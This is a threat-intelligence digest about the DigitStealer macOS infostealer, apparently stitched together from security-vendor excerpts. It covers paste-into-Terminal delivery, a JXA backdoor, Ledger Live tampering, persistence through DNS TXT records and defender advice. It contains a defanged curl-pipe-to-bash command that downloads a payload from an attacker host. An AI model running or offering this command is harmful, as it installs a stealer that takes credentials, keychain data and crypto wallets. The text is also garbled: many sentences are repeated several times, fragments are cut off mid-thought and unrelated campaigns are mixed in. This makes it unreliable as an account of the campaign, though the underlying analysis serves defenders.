DigitStealer

Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements—that either prompt them to download fake applications or instruct them to copy and paste commands into their Terminal.

Mac users are encountering deceptive websites—often through Google Ads or malicious advertisements... During November 2025, Microsoft Defender Experts identified a WhatsApp platform abuse campaign... sends malicious attachments to all contacts using predefined messaging templates.

The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record.

Adversaries began using those same paste-and-run methods on macOS, replacing PowerShell with a combination of shell script and AppleScript code.

Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we’ve observed in previous years executed to gather data and exfiltrate.

curl -fsSL https[:]//67e5143a9ca7d2240c137ef80f2641d6.pages[.]dev/c9c114433040497328fe9212012b1b94.aspx| bash

A second, more complex JavaScript for Automation (JXA) payload is delivered... The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.

Adversaries began exploring how they could distribute malware in script form to evade Gatekeeper entirely... Adversaries began using those same paste-and-run methods on macOS... Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we’ve observed in previous years executed to gather data and exfiltrate.

The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record.

LaunchAgent or LaunchDaemon for recurring execution.

LaunchAgent or LaunchDaemon for recurring execution.

The third payload zeroes in on users of Ledger Live, modifying the application configuration to redirect sensitive data... replaces or modifies the data.endpoint object with attacker-supplied values.

The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record.

LaunchAgent or LaunchDaemon for recurring execution.

LaunchAgent or LaunchDaemon for recurring execution.

The newly discovered sample was found packaged as an unsigned disk image named DynamicLake.dmg, spoofing the legitimate macOS utility... The disk image appears to masquerade as the legitimate DynamicLake macOS utility... Instead, the fake version is distributed via the domain dynamiclake[.]org.

Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.

The script introduces a new set of anti-analysis checks targeting Apple Silicon systems… to determine whether the target system is running on an Apple Silicon M2 chip or newer.

The AppleScript retrieved by the stealer modifies Ledger Live differently than many previous campaigns… downloading three separate parts and concatenating them. This multi-part assembly tactic is designed to evade single-file detection by security tools.

The third payload zeroes in on users of Ledger Live, modifying the application configuration to redirect sensitive data... replaces or modifies the data.endpoint object with attacker-supplied values.

The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.

Leverage Defender’s custom detection rules to alert on abnormal access to Keychain, browser credential stores, and cloud/developer artifacts, including SSH keys, Kubernetes configs, AWS credentials, and wallet data.

These campaigns leverage... to harvest credentials, session data, secrets from browsers, keychains, and developer environments.

All three harvest the same types of data—browser credentials, saved passwords... CrystalPDF.exe... covertly hijacking Firefox and Chrome browsers to access sensitive files... including cookies, session data, and credential caches.

The third payload zeroes in on users of Ledger Live, modifying the application configuration to redirect sensitive data... replaces or modifies the data.endpoint object with attacker-supplied values.

A second, more complex JavaScript for Automation (JXA) payload is delivered to harvest... macOS Keychain

Once decoded, the dropper reveals unusually extensive anti-analysis features, including locale restrictions, VM detection, and hardware-specific sysctl checks.

The script introduces a new set of anti-analysis checks targeting Apple Silicon systems… to determine whether the target system is running on an Apple Silicon M2 chip or newer.

One notable addition is a locale check… to determine the system’s country setting and exit if it matches certain predefined values.

Collecting and zipping Desktop, Documents, Downloads, and Notes

The first major payload is surprisingly straightforward: an AppleScript that prompts the victim for their macOS password and immediately begins credential harvesting.

A second, more complex JavaScript for Automation (JXA) payload is delivered to harvest: Browser data (Chrome, Brave, Edge, Firefox) Cryptocurrency wallets (Ledger, Electrum, Exodus, Coinomi) macOS Keychain VPN configurations Telegram data

Collecting and zipping Desktop, Documents, Downloads, and Notes

The downloaded JXA script acts as a long-running backdoor, polling the C2 server every 10 seconds for new AppleScript or JavaScript commands.

Inspect network egress for POST requests to newly registered or suspicious domains... Exfiltration through curl.

The final stage establishes persistence through a Launch Agent that dynamically retrieves its payload from a DNS TXT record: “This method of fetching a value from a TXT record… is not something we have previously observed in macOS infostealers.”

Stealing and exfiltrating credentials and files via the attacker’s domain